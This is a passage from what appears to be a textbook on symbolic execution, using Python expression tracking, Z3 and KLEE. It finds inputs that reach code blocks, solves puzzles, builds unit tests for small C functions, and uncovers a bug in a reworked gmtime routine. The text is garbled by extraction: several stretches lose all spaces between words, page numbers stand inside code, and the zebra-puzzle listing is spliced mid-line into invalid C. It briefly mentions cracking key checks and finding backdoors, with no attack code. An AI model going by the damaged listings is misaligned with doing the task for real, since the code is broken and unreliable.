wday = (dayno + 4) % 7

if wday==5:
    print "Thanks God, it's Friday!"

Let's say we should find a way to run the block with the print call in it. What should the input value be?
First,let’sbuildexpressionof wdayvariable: #!/usr/bin/env python class Expr: def __init__(self,s): self.s=s def convert_to_Expr_if_int(self, n): if isinstance(n, int): return Expr(str(n)) if isinstance(n, Expr): return n raise AssertionError # unsupported type def __str__(self): return self.s 71 def __div__(self, other): return Expr("(" + self.s + "/" + self.convert_to_Expr_if_int(other).s + ")") def __mod__(self, other): return Expr("(" + self.s + "%" + self.convert_to_Expr_if_int(other).s + ")") def __add__(self, other): return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")") input=Expr("input") SECS_DAY=24*60*60 dayno = input / SECS_DAY wday = (dayno + 4) % 7 print wday if wday==5: print "Thanks God, it's Friday!" (((input/86400)+4)%7) Inordertoexecutetheblock,weshouldsolvethisequation: ((input 86400+ 4)5mod 7. Sofar,thisiseasytaskforZ3: #!/usr/bin/env python from z3 import * s=Solver() x=Int("x") s.add(((x/86400)+4)%7==5) s.check() print s.model() [x = 86438] ThisisindeedcorrectUNIXtimestampforFriday: % date --date='@86438' Fri Jan 2 03:00:38 MSK 1970 Thoughthedatebackinyear1970,butit’sstillcorrect! This is also called “path constraint”, i.e., what constraint must be satisified to execute specific block? Severaltoolshas“path”intheirnames,like“pathgrind”, SymbolicPathFinder ,CodeSurferPathInspector, etc. Liketheshellgame,thistaskisalsooftenencountersinpractice. Youcanseethatsomethingdangerous canbeexecutedinsidesomebasicblockandyou’retryingtodeduce,whatinputvaluescancauseexecution ofit. Itmaybebufferoverflow,etc. Suchinputvaluesaresometimesalsocalled“inputsofdeath”. Manycrackmesaresolvedinthisway,allyouneedisfindapathintoblockwhichprints“keyiscorrect” orsomethinglikethat. Wecanextendthistinyexample: input=... SECS_DAY=24*60*60 dayno = input / SECS_DAY wday = (dayno + 4) % 7 print wday if wday==5: print "Thanks God, it's Friday!" 
else:
    print "Got to wait a little"

Now we have two blocks. For the first we should solve this equation: ((input / 86400) + 4) ≡ 5 (mod 7). But for the second we should solve the inverted equation: ((input / 86400) + 4) ≢ 5 (mod 7). By solving these equations, we will find two paths into both blocks.

KLEE (or a similar tool) tries to find a path to each [basic] block and produces an "ideal" unit test. Hence, KLEE can find a path into the block which crashes everything, or report about the correctness of the input key/license, etc. Surprisingly, KLEE can find backdoors in the very same manner.

KLEE is also called the "KLEE Symbolic Virtual Machine": by that, its creators mean that KLEE is a VM[72] which executes code symbolically rather than numerically (like a usual CPU).

8.2.7 Division by zero

If a division by zero is not guarded by a sanitizing check, and the exception isn't caught, it can crash the process.

Let's calculate the simple expression x / (2y + 4z - 12). We can add a warning into the __div__ method:

#!/usr/bin/env python

class Expr:
    def __init__(self,s):
        self.s=s
    def convert_to_Expr_if_int(self, n):
        if isinstance(n, int):
            return Expr(str(n))
        if isinstance(n, Expr):
            return n
        raise AssertionError # unsupported type
    def __str__(self):
        return self.s
    def __mul__(self, other):
        return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
    def __div__(self, other):
        op2=self.convert_to_Expr_if_int(other).s
        print "warning: division by zero if "+op2+"==0"
        return Expr("(" + self.s + "/" + op2 + ")")
    def __add__(self, other):
        return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
    def __sub__(self, other):
        return Expr("(" + self.s + "-" + self.convert_to_Expr_if_int(other).s + ")")

"""
      x
------------
2y + 4z - 12
"""
def f(x, y, z):
    return x/(y*2 + z*4 - 12)

print f(Expr("x"), Expr("y"), Expr("z"))

...so it will report about dangerous states and conditions:

warning: division by zero if (((y*2)+(z*4))-12)==0
(x/(((y*2)+(z*4))-12))

This equation is easy to solve; let's try Wolfram Mathematica this time:

In[]:= FindInstance[{(y*2 + z*4) - 12 == 0}, {y, z}, Integers]
Out[]= {{y -> 0, z -> 3}}

These values for
y and z can also be called "inputs of death".

8.2.8 Merge sort

How does merge sort work? I have copypasted the Python code from rosettacode.org almost intact:

#!/usr/bin/env python

class Expr:
    def __init__(self,s,i):
        self.s=s
        self.i=i
    def __str__(self):
        # return both symbolic and integer:
        return self.s+" (" + str(self.i)+")"
    def __le__(self, other):
        # compare only integer parts:
        return self.i <= other.i

# copypasted from http://rosettacode.org/wiki/Sorting_algorithms/Merge_sort#Python
def merge(left, right):
    result = []
    left_idx, right_idx = 0, 0
    while left_idx < len(left) and right_idx < len(right):
        # change the direction of this comparison to change the direction of the sort
        if left[left_idx] <= right[right_idx]:
            result.append(left[left_idx])
            left_idx += 1
        else:
            result.append(right[right_idx])
            right_idx += 1
    if left_idx < len(left):
        result.extend(left[left_idx:])
    if right_idx < len(right):
        result.extend(right[right_idx:])
    return result

def tabs (t):
    return "\t"*t

def merge_sort(m, indent=0):
    print tabs(indent)+"merge_sort() begin. input:"
    for i in m:
        print tabs(indent)+str(i)
    if len(m) <= 1:
        print tabs(indent)+"merge_sort() end. returning single element"
        return m
    middle = len(m) // 2
    left = m[:middle]
    right = m[middle:]
    left = merge_sort(left, indent+1)
    right = merge_sort(right, indent+1)
    rt=list(merge(left, right))
    print tabs(indent)+"merge_sort() end. returning:"
    for i in rt:
        print tabs(indent)+str(i)
    return rt

# input buffer has both symbolic and numerical values:
input=[Expr("input1",22), Expr("input2",7), Expr("input3",2), Expr("input4",1), Expr("input5",8), Expr("input6",4)]
merge_sort(input)

[72] Virtual Machine

The crucial part is the function which compares elements; obviously, the sort wouldn't work correctly without it. So we track both the expression for each element and its numerical value. Both are printed at the end, but whenever values are to be compared, only the numerical parts are used. Result:

merge_sort() begin. input:
input1 (22)
input2 (7)
input3 (2)
input4 (1)
input5 (8)
input6 (4)
merge_sort() begin.
input:
    input1 (22)
    input2 (7)
    input3 (2)
        merge_sort() begin. input:
        input1 (22)
        merge_sort() end. returning single element
        merge_sort() begin. input:
        input2 (7)
        input3 (2)
            merge_sort() begin. input:
            input2 (7)
            merge_sort() end. returning single element
            merge_sort() begin. input:
            input3 (2)
            merge_sort() end. returning single element
        merge_sort() end. returning:
        input3 (2)
        input2 (7)
    merge_sort() end. returning:
    input3 (2)
    input2 (7)
    input1 (22)
    merge_sort() begin. input:
    input4 (1)
    input5 (8)
    input6 (4)
        merge_sort() begin. input:
        input4 (1)
        merge_sort() end. returning single element
        merge_sort() begin. input:
        input5 (8)
        input6 (4)
            merge_sort() begin. input:
            input5 (8)
            merge_sort() end. returning single element
            merge_sort() begin. input:
            input6 (4)
            merge_sort() end. returning single element
        merge_sort() end. returning:
        input6 (4)
        input5 (8)
    merge_sort() end. returning:
    input4 (1)
    input6 (4)
    input5 (8)
merge_sort() end. returning:
input4 (1)
input3 (2)
input6 (4)
input2 (7)
input5 (8)
input1 (22)

8.2.9 Extending the Expr class

This is somewhat pointless; nevertheless, it's an easy task to extend my Expr class to support an AST instead of plain strings. It's also possible to add folding steps (like I demonstrated in the Toy Decompiler: 7). Maybe someone will want to do this as an exercise. By the way, the toy decompiler can be used as a simple symbolic engine as well: just feed all the instructions to it, and it will track the contents of each register.

8.2.10 Conclusion

For the sake of demonstration, I made things as simple as possible. But reality is always harsh and inconvenient, so all this shouldn't be taken as a silver bullet.

The files used in this part: https://github.com/dennis714/SAT_SMT_article/tree/master/symbolic .

8.3 Further reading

James C. King, Symbolic Execution and Program Testing: https://yurichev.com/mirrors/king76symbolicexecution.pdf

9 KLEE

9.1 Installation

Building KLEE from source is tricky. The easiest way to use KLEE is to install docker (https://docs.docker.com/engine/installation/linux/ubuntulinux/) and then to run the KLEE docker image (http://klee.github.io/docker/).

9.2 School-level equation

Let's revisit the school-level system of equations from (5.2).
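Before handing the system to KLEE, it can be cross-checked by plain brute force. The three constraints below are the ones the KLEE example that follows encodes; the 0..9 search range is my assumption (a sketch, not part of the original text):

```python
from itertools import product

# The same three constraints the KLEE example encodes:
#   circle + circle == 10
#   circle*square + square == 12
#   circle*square - triangle*circle == circle
solutions = [(c, s, t) for c, s, t in product(range(10), repeat=3)
             if c + c == 10 and c*s + s == 12 and c*s - t*c == c]
print(solutions)  # [(5, 2, 1)]: circle=5, square=2, triangle=1
```

Within 0..9 the solution is unique, which is consistent with KLEE generating a single test.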
We will force KLEE to find a path where all the constraints are satisfied:

int main()
{
    int circle, square, triangle;

    klee_make_symbolic(&circle, sizeof circle, "circle");
    klee_make_symbolic(&square, sizeof square, "square");
    klee_make_symbolic(&triangle, sizeof triangle, "triangle");

    if (circle+circle!=10) return 0;
    if (circle*square+square!=12) return 0;
    if (circle*square-triangle*circle!=circle) return 0;

    // all constraints should be satisfied at this point
    // force KLEE to produce .err file:
    klee_assert(0);
};

% clang -emit-llvm -c -g klee_eq.c
...
% klee klee_eq.bc
KLEE: output directory is "/home/klee/klee-out-93"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_eq.c:18: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 32
KLEE: done: completed paths = 1
KLEE: done: generated tests = 1

Let's find out where klee_assert() has been triggered:

% ls klee-last | grep err
test000001.external.err

% ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['klee_eq.bc']
num objects: 3
object 0: name: b'circle'
object 0: size: 4
object 0: data: 5
object 1: name: b'square'
object 1: size: 4
object 1: data: 2
object 2: name: b'triangle'
object 2: size: 4
object 2: data: 1

This is indeed the correct solution to the system of equations.

KLEE has an intrinsic klee_assume() which tells KLEE to cut the path if some constraint is not satisfied.
So we can rewrite our example in this cleaner way:

int main()
{
    int circle, square, triangle;

    klee_make_symbolic(&circle, sizeof circle, "circle");
    klee_make_symbolic(&square, sizeof square, "square");
    klee_make_symbolic(&triangle, sizeof triangle, "triangle");

    klee_assume (circle+circle==10);
    klee_assume (circle*square+square==12);
    klee_assume (circle*square-triangle*circle==circle);

    // all constraints should be satisfied at this point
    // force KLEE to produce .err file:
    klee_assert(0);
};

9.3 Zebra puzzle

Let's revisit the zebra puzzle from (5.4). We just define all the variables and add constraints:

int main()
{
    int Yellow, Blue, Red, Ivory, Green;
    int Norwegian, Ukrainian, Englishman, Spaniard, Japanese;
    int Water, Tea, Milk, OrangeJuice, Coffee;
    int Kools, Chesterfield, OldGold, LuckyStrike, Parliament;
    int Fox, Horse, Snails, Dog, Zebra;

    klee_make_symbolic(&Yellow, sizeof(int), "Yellow");
    klee_make_symbolic(&Blue, sizeof(int), "Blue");
    klee_make_symbolic(&Red, sizeof(int), "Red");
    klee_make_symbolic(&Ivory, sizeof(int), "Ivory");
    klee_make_symbolic(&Green, sizeof(int), "Green");
    klee_make_symbolic(&Norwegian, sizeof(int), "Norwegian");
    klee_make_symbolic(&Ukrainian, sizeof(int), "Ukrainian");
    klee_make_symbolic(&Englishman, sizeof(int), "Englishman");
    klee_make_symbolic(&Spaniard, sizeof(int), "Spaniard");
    klee_make_symbolic(&Japanese, sizeof(int), "Japanese");
    klee_make_symbolic(&Water, sizeof(int), "Water");
    klee_make_symbolic(&Tea, sizeof(int), "Tea");
    klee_make_symbolic(&Milk, sizeof(int), "Milk");
    klee_make_symbolic(&OrangeJuice, sizeof(int), "OrangeJuice");
    klee_make_symbolic(&Coffee, sizeof(int), "Coffee");
    klee_make_symbolic(&Kools, sizeof(int), "Kools");
    klee_make_symbolic(&Chesterfield, sizeof(int), "Chesterfield");
    klee_make_symbolic(&OldGold, sizeof(int), "OldGold");
    klee_make_symbolic(&LuckyStrike, sizeof(int), "LuckyStrike");
    klee_make_symbolic(&Parliament, sizeof(int),
"Parliament"); klee_make_symbolic(&Fox, sizeof(int), "Fox"); klee_make_symbolic(&Horse, sizeof(int), "Horse"); klee_make_symbolic(&Snails, sizeof(int), "Snails"); klee_make_symbolic(&Dog, sizeof(int), "Dog"); klee_make_symbolic(&Zebra, sizeof(int), "Zebra"); // limits. if (Yellow<1 || Yellow>5) return 0; if (Blue<1 || Blue>5) return 0; if (Red<1 || Red>5) return 0; if (Ivory<1 || Ivory>5) return 0; if (Green<1 || Green>5) return 0; if (Norwegian<1 || Norwegian>5) return 0; if (Ukrainian<1 || Ukrainian>5) return 0; if (Englishman<1 || Englishman>5) return 0; if (Spaniard<1 || Spaniard>5) return 0; if (Japanese<1 || Japanese>5) return 0; if (Water<1 || Water>5) return 0; if (Tea<1 || Tea>5) return 0; 77 if (Milk<1 || Milk>5) return 0; if (OrangeJuice<1 || OrangeJuice>5) return 0; if (Coffee<1 || Coffee>5) return 0; if (Kools<1 || Kools>5) return 0; if (Chesterfield<1 || Chesterfield>5) return 0; if (OldGold<1 || OldGold>5) return 0; if (LuckyStrike<1 || LuckyStrike>5) return 0; if (Parliament<1 || Parliament>5) return 0; if (Fox<1 || Fox>5) return 0; if (Horse<1 || Horse>5) return 0; if (Snails<1 || Snails>5) return 0; if (Dog<1 || Dog>5) return 0; if (Zebra<1 || Zebra>5) return 0; // colors are distinct for all 5 houses: if (((1<=1 && Yellow<=5); klee_assume (Blue>=1 && Blue<=5); klee_assume (Red>=1 && Red<=5); klee_assume (Ivory>=1 && Ivory<=5); klee_assume (Green>=1 && Green<=5); klee_assume (Norwegian>=1 && Norwegian<=5); klee_assume (Ukrainian>=1 && Ukrainian<=5); klee_assume (Englishman>=1 && Englishman<=5); klee_assume (Spaniard>=1 && Spaniard<=5); klee_assume (Japanese>=1 && Japanese<=5); klee_assume (Water>=1 && Water<=5); klee_assume (Tea>=1 && Tea<=5); klee_assume (Milk>=1 && Milk<=5); klee_assume (OrangeJuice>=1 && OrangeJuice<=5); klee_assume (Coffee>=1 && Coffee<=5); klee_assume (Kools>=1 && Kools<=5); klee_assume (Chesterfield>=1 && Chesterfield<=5); klee_assume (OldGold>=1 && OldGold<=5); klee_assume (LuckyStrike>=1 && LuckyStrike<=5); klee_assume 
(Parliament>=1 && Parliament<=5);
    klee_assume (Fox>=1 && Fox<=5);
    klee_assume (Horse>=1 && Horse<=5);
    klee_assume (Snails>=1 && Snails<=5);
    klee_assume (Dog>=1 && Dog<=5);
    klee_assume (Zebra>=1 && Zebra<=5);

    // colors are distinct for all 5 houses:
    klee_assume (((1<<Yellow) | (1<<Blue) | (1<<Red) | (1<<Ivory) | (1<<Green))==0x3E);

    ...

9.4 Sudoku

#include <stdint.h>

/*
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
*/

uint8_t cells[9][9];

// http://www.norvig.com/sudoku.html
// http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
char *puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97..";

int main()
{
    klee_make_symbolic(cells, sizeof cells, "cells");

    // process text line:
    for (int row=0; row<9; row++)
        for (int column=0; column<9; column++)
        {
            char c=puzzle[row*9 + column];
            if (c!='.')
            {
                if (cells[row][column]!=c-'0') return 0;
            }
            else
            {
                // limit cells values to 1..9:
                if (cells[row][column]<1) return 0;
                if (cells[row][column]>9) return 0;
            };
        };

    // for all 9 rows
    for (int row=0; row<9; row++)
    {
        if (((1<<cells[row][0]) | (1<<cells[row][1]) | (1<<cells[row][2]) |
             (1<<cells[row][3]) | (1<<cells[row][4]) | (1<<cells[row][5]) |
             (1<<cells[row][6]) | (1<<cells[row][7]) | (1<<cells[row][8]))!=0x3FE) return 0;

    ...

The same can be done with klee_assume():

/*
coordinates:
------------------------------
00 01 02 | 03 04 05 | 06 07 08
10 11 12 | 13 14 15 | 16 17 18
20 21 22 | 23 24 25 | 26 27 28
------------------------------
30 31 32 | 33 34 35 | 36 37 38
40 41 42 | 43 44 45 | 46 47 48
50 51 52 | 53 54 55 | 56 57 58
------------------------------
60 61 62 | 63 64 65 | 66 67 68
70 71 72 | 73 74 75 | 76 77 78
80 81 82 | 83 84 85 | 86 87 88
------------------------------
*/

uint8_t cells[9][9];

// http://www.norvig.com/sudoku.html
// 
http://www.mirror.co.uk/news/weird-news/worlds-hardest-sudoku-can-you-242294
char *puzzle="..53.....8......2..7..1.5..4....53...1..7...6..32...8..6.5....9..4....3......97..";

int main()
{
    klee_make_symbolic(cells, sizeof cells, "cells");

    // process text line:
    for (int row=0; row<9; row++)
        for (int column=0; column<9; column++)
        {
            char c=puzzle[row*9 + column];
            if (c!='.')
                klee_assume (cells[row][column]==c-'0');
            else
            {
                klee_assume (cells[row][column]>=1);
                klee_assume (cells[row][column]<=9);
            };
        };

    // for all 9 rows
    for (int row=0; row<9; row++)
    {
        klee_assume (((1<<cells[row][0]) | (1<<cells[row][1]) | (1<<cells[row][2]) |
                      (1<<cells[row][3]) | (1<<cells[row][4]) | (1<<cells[row][5]) |
                      (1<<cells[row][6]) | (1<<cells[row][7]) | (1<<cells[row][8]))==0x3FE);

    ...

9.5 Unit test: HTML color

#include <stdio.h>
#include <string.h>
#include <stdint.h>

void HTML_color(uint8_t R, uint8_t G, uint8_t B, char* out)
{
    if (R==0xFF && G==0 && B==0)
    {
        strcpy (out, "red"); return;
    };
    if (R==0x0 && G==0xFF && B==0)
    {
        strcpy (out, "green"); return;
    };
    if (R==0 && G==0 && B==0xFF)
    {
        strcpy (out, "blue"); return;
    };

    // abbreviated hexadecimal
    if (R>>4==(R&0xF) && G>>4==(G&0xF) && B>>4==(B&0xF))
    {
        sprintf (out, "#%X%X%X", R&0xF, G&0xF, B&0xF); return;
    };

    // last resort
    sprintf (out, "#%02X%02X%02X", R, G, B);
};

int main()
{
    uint8_t R, G, B;

    klee_make_symbolic (&R, sizeof R, "R");
    klee_make_symbolic (&G, sizeof R, "G");
    klee_make_symbolic (&B, sizeof R, "B");

    char tmp[16];

    HTML_color(R, G, B, tmp);
};

There are 5 possible paths in this function; let's see if KLEE can find them all.
It’sindeedso: % clang -emit-llvm -c -g color.c % klee color.bc KLEE: output directory is "/home/klee/klee-out-134" KLEE: WARNING: undefined reference to function: sprintf KLEE: WARNING: undefined reference to function: strcpy KLEE: WARNING ONCE: calling external: strcpy(51867584, 51598960) KLEE: ERROR: /home/klee/color.c:33: external call with symbolic argument: sprintf KLEE: NOTE: now ignoring this error at this location KLEE: ERROR: /home/klee/color.c:28: external call with symbolic argument: sprintf KLEE: NOTE: now ignoring this error at this location KLEE: done: total instructions = 479 KLEE: done: completed paths = 19 KLEE: done: generated tests = 5 Wecanignorecallstostrcpy()andsprintf(),becausewearenotreallyinterestinginstateof outvariable. Sothereareexactly5paths: % ls klee-last assembly.ll run.stats test000003.ktest test000005.ktest info test000001.ktest test000003.pc test000005.pc messages.txt test000002.ktest test000004.ktest warnings.txt run.istats test000003.exec.err test000005.exec.err 1stsetofinputvariableswillresultin“red”string: % ktest-tool --write-ints klee-last/test000001.ktest ktest file : 'klee-last/test000001.ktest' args : ['color.bc'] num objects: 3 object 0: name: b'R' object 0: size: 1 object 0: data: b'\xff' object 1: name: b'G' object 1: size: 1 object 1: data: b'\x00' object 2: name: b'B' object 2: size: 1 object 2: data: b'\x00' 2ndsetofinputvariableswillresultin“green”string: % ktest-tool --write-ints klee-last/test000002.ktest ktest file : 'klee-last/test000002.ktest' args : ['color.bc'] num objects: 3 object 0: name: b'R' object 0: size: 1 object 0: data: b'\x00' object 1: name: b'G' object 1: size: 1 object 1: data: b'\xff' object 2: name: b'B' object 2: size: 1 object 2: data: b'\x00' 3rdsetofinputvariableswillresultin“#010000”string: % ktest-tool --write-ints klee-last/test000003.ktest ktest file : 'klee-last/test000003.ktest' args : ['color.bc'] 86 num objects: 3 object 0: name: b'R' object 0: size: 1 object 0: data: b'\x01' 
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x00'

The 4th set of input variables results in the "blue" string:

% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args       : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\x00'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\xff'

The 5th set of input variables results in the "#F01" string:

% ktest-tool --write-ints klee-last/test000005.ktest
ktest file : 'klee-last/test000005.ktest'
args       : ['color.bc']
num objects: 3
object 0: name: b'R'
object 0: size: 1
object 0: data: b'\xff'
object 1: name: b'G'
object 1: size: 1
object 1: data: b'\x00'
object 2: name: b'B'
object 2: size: 1
object 2: data: b'\x11'

These 5 sets of input variables can form a unit test for our function.

9.6 Unit test: strcmp() function

The standard strcmp() function from the C library can return 0, -1 or 1, depending on the comparison result. Here is my own implementation of strcmp():

int my_strcmp(const char *s1, const char *s2)
{
    int ret = 0;

    while (1)
    {
        ret = *(unsigned char *) s1 - *(unsigned char *) s2;
        if (ret!=0)
            break;
        if ((*s1==0) || (*s2)==0)
            break;
        s1++; s2++;
    };

    if (ret < 0)
        return -1;
    else if (ret > 0)
        return 1;
    return 0;
}

int main()
{
    char input1[2];
    char input2[2];

    klee_make_symbolic(input1, sizeof input1, "input1");
    klee_make_symbolic(input2, sizeof input2, "input2");

    klee_assume((input1[0]>='a') && (input1[0]<='z'));
    klee_assume((input2[0]>='a') && (input2[0]<='z'));
    klee_assume(input1[1]==0);
    klee_assume(input2[1]==0);

    my_strcmp (input1, input2);
};

Let's find out if KLEE is capable of finding all three paths. I intentionally made things simpler for KLEE by limiting the input arrays to 2 bytes each, i.e., 1 character plus a terminating zero byte.
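As a side check (mine, not from the original), the expected outcomes over these constrained inputs can be enumerated directly; for one-character strings the comparison reduces to a single byte subtraction:

```python
import string

# Model of my_strcmp() restricted to the same inputs KLEE gets:
# one character in 'a'..'z' plus a terminating zero byte.
def my_strcmp_1char(a, b):
    d = ord(a) - ord(b)       # same subtraction as in the C code
    return (d > 0) - (d < 0)  # normalize to -1/0/1

outcomes = {my_strcmp_1char(a, b)
            for a in string.ascii_lowercase
            for b in string.ascii_lowercase}
print(sorted(outcomes))  # [-1, 0, 1] -- the three paths KLEE has to cover
```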
% clang -emit-llvm -c -g strcmp.c
% klee strcmp.bc
KLEE: output directory is "/home/klee/klee-out-131"
KLEE: ERROR: /home/klee/strcmp.c:35: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/strcmp.c:36: invalid klee_assume call (provably false)
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 137
KLEE: done: completed paths = 5
KLEE: done: generated tests = 5

% ls klee-last
assembly.ll   run.stats            test000002.ktest     test000004.ktest
info          test000001.ktest     test000002.pc        test000005.ktest
messages.txt  test000001.pc        test000002.user.err  warnings.txt
run.istats    test000001.user.err  test000003.ktest

The first two errors are about klee_assume(): these are the input values on which the klee_assume() calls got stuck. We can ignore them, or take a peek out of curiosity:

% ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args       : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'\x00\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'\x00\x00'

% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args       : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'a\xff'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'\x00\x00'

The three remaining files hold the input values for each path inside my implementation of strcmp():

% ktest-tool --write-ints klee-last/test000003.ktest
ktest file : 'klee-last/test000003.ktest'
args       : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'b\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'c\x00'

% ktest-tool --write-ints klee-last/test000004.ktest
ktest file : 'klee-last/test000004.ktest'
args       : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'c\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data:
b'a\x00'

% ktest-tool --write-ints klee-last/test000005.ktest
ktest file : 'klee-last/test000005.ktest'
args       : ['strcmp.bc']
num objects: 2
object 0: name: b'input1'
object 0: size: 2
object 0: data: b'a\x00'
object 1: name: b'input2'
object 1: size: 2
object 1: data: b'a\x00'

The 3rd is the case where the first argument ("b") is lesser than the second ("c"). The 4th is the opposite case ("c" and "a"). The 5th is the case where they are equal ("a" and "a"). Using these 3 test cases, we get full coverage of our implementation of strcmp().

9.7 UNIX date/time

UNIX date/time (https://en.wikipedia.org/wiki/Unix_time) is the number of seconds that have elapsed since 1-Jan-1970 00:00 UTC. The C/C++ gmtime() function is used to decode this value into a human-readable date/time.

Here is a piece of code I've copypasted from some ancient version of Minix OS (http://www.cise.ufl.edu/~cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/gmtime.c) and reworked slightly:

1   #include <stdio.h>
2   #include <stdint.h>
3   #include <assert.h>
4
5   /*
6    * copypasted and reworked from
7    * http://www.cise.ufl.edu/~cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/loc_time.h
8    * http://www.cise.ufl.edu/~cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/misc.c
9    * http://www.cise.ufl.edu/~cop4600/cgi-bin/lxr/http/source.cgi/lib/ansi/gmtime.c
10   */
11
12  #define YEAR0 1900
13  #define EPOCH_YR 1970
14  #define SECS_DAY (24L * 60L * 60L)
15  #define YEARSIZE(year) (LEAPYEAR(year) ?
366 : 365)
16
17  const int _ytab[2][12] =
18  {
19      { 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 },
20      { 31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31 }
21  };
22
23  const char *_days[] =
24  {
25      "Sunday", "Monday", "Tuesday", "Wednesday",
26      "Thursday", "Friday", "Saturday"
27  };
28
29  const char *_months[] =
30  {
31      "January", "February", "March",
32      "April", "May", "June",
33      "July", "August", "September",
34      "October", "November", "December"
35  };
36
37  #define LEAPYEAR(year) (!((year) % 4) && (((year) % 100) || !((year) % 400)))
38
39  void decode_UNIX_time(const time_t time)
40  {
41      unsigned int dayclock, dayno;
42      int year = EPOCH_YR;
43
44      dayclock = (unsigned long)time % SECS_DAY;
45      dayno = (unsigned long)time / SECS_DAY;
46
47      int seconds = dayclock % 60;
48      int minutes = (dayclock % 3600) / 60;
49      int hour = dayclock / 3600;
50      int wday = (dayno + 4) % 7;
51      while (dayno >= YEARSIZE(year))
52      {
53          dayno -= YEARSIZE(year);
54          year++;
55      }
56
57      year = year - YEAR0;
58
59      int month = 0;
60
61      while (dayno >= _ytab[LEAPYEAR(year)][month])
62      {
63          dayno -= _ytab[LEAPYEAR(year)][month];
64          month++;
65      }
66
67      char *s;
68      switch (month)
69      {
70      case 0: s="January"; break;
71      case 1: s="February"; break;
72      case 2: s="March"; break;
73      case 3: s="April"; break;
74      case 4: s="May"; break;
75      case 5: s="June"; break;
76      case 6: s="July"; break;
77      case 7: s="August"; break;
78      case 8: s="September"; break;
79      case 9: s="October"; break;
80      case 10: s="November"; break;
81      case 11: s="December"; break;
82      default:
83          assert(0);
84      };
85
86      printf ("%04d-%s-%02d %02d:%02d:%02d\n", YEAR0+year, s, dayno+1, hour, minutes, seconds);
87      printf ("week day: %s\n", _days[wday]);
88  }
89
90  int main()
91  {
92      uint32_t time;
93
94      klee_make_symbolic(&time, sizeof time, "time");
95
96      decode_UNIX_time(time);
97
98      return 0;
99  }

Let's try it:

% clang -emit-llvm -c -g klee_time1.c
...
% klee klee_time1.bc
KLEE: output directory is "/home/klee/klee-out-107"
KLEE: WARNING: undefined reference to function: printf
KLEE: ERROR: /home/klee/klee_time1.c:86: external call with symbolic argument: printf
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_time1.c:83: ASSERTION FAIL: 0
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 101579
KLEE: done: completed paths = 1635
KLEE: done: generated tests = 2

Wow, the assert() at line 83 has been triggered. Why? Let's see the UNIX time value which triggers it:

% ls klee-last | grep err
test000001.exec.err
test000002.assert.err

% ktest-tool --write-ints klee-last/test000002.ktest
ktest file : 'klee-last/test000002.ktest'
args       : ['klee_time1.bc']
num objects: 1
object 0: name: b'time'
object 0: size: 4
object 0: data: 978278400

Let's decode this value using the UNIX date utility:

% date -u --date='@978278400'
Sun Dec 31 16:00:00 UTC 2000

After some investigation, I found that the month variable can hold the incorrect value of 12 (while 11 is the maximum, for December), because the LEAPYEAR() macro should receive the year number as 2000, not as 100. So I introduced a bug while reworking this function, and KLEE found it!

Just out of interest: what happens if I replace the switch() with an array of strings, as it usually appears in concise C/C++ code?

...
const char *_months[] =
{
    "January", "February", "March",
    "April", "May", "June",
    "July", "August", "September",
    "October", "November", "December"
};
...
    while (dayno >= _ytab[LEAPYEAR(year)][month])
    {
        dayno -= _ytab[LEAPYEAR(year)][month];
        month++;
    }

    char *s=_months[month];

    printf ("%04d-%s-%02d %02d:%02d:%02d\n", YEAR0+year, s, dayno+1, hour, minutes, seconds);
    printf ("week day: %s\n", _days[wday]);
...
KLEE detects an attempt to read beyond the array boundaries:

% klee klee_time2.bc
KLEE: output directory is "/home/klee/klee-out-108"
KLEE: WARNING: undefined reference to function: printf
KLEE: ERROR: /home/klee/klee_time2.c:69: external call with symbolic argument: printf
KLEE: NOTE: now ignoring this error at this location
KLEE: ERROR: /home/klee/klee_time2.c:67: memory error: out of bound pointer
KLEE: NOTE: now ignoring this error at this location
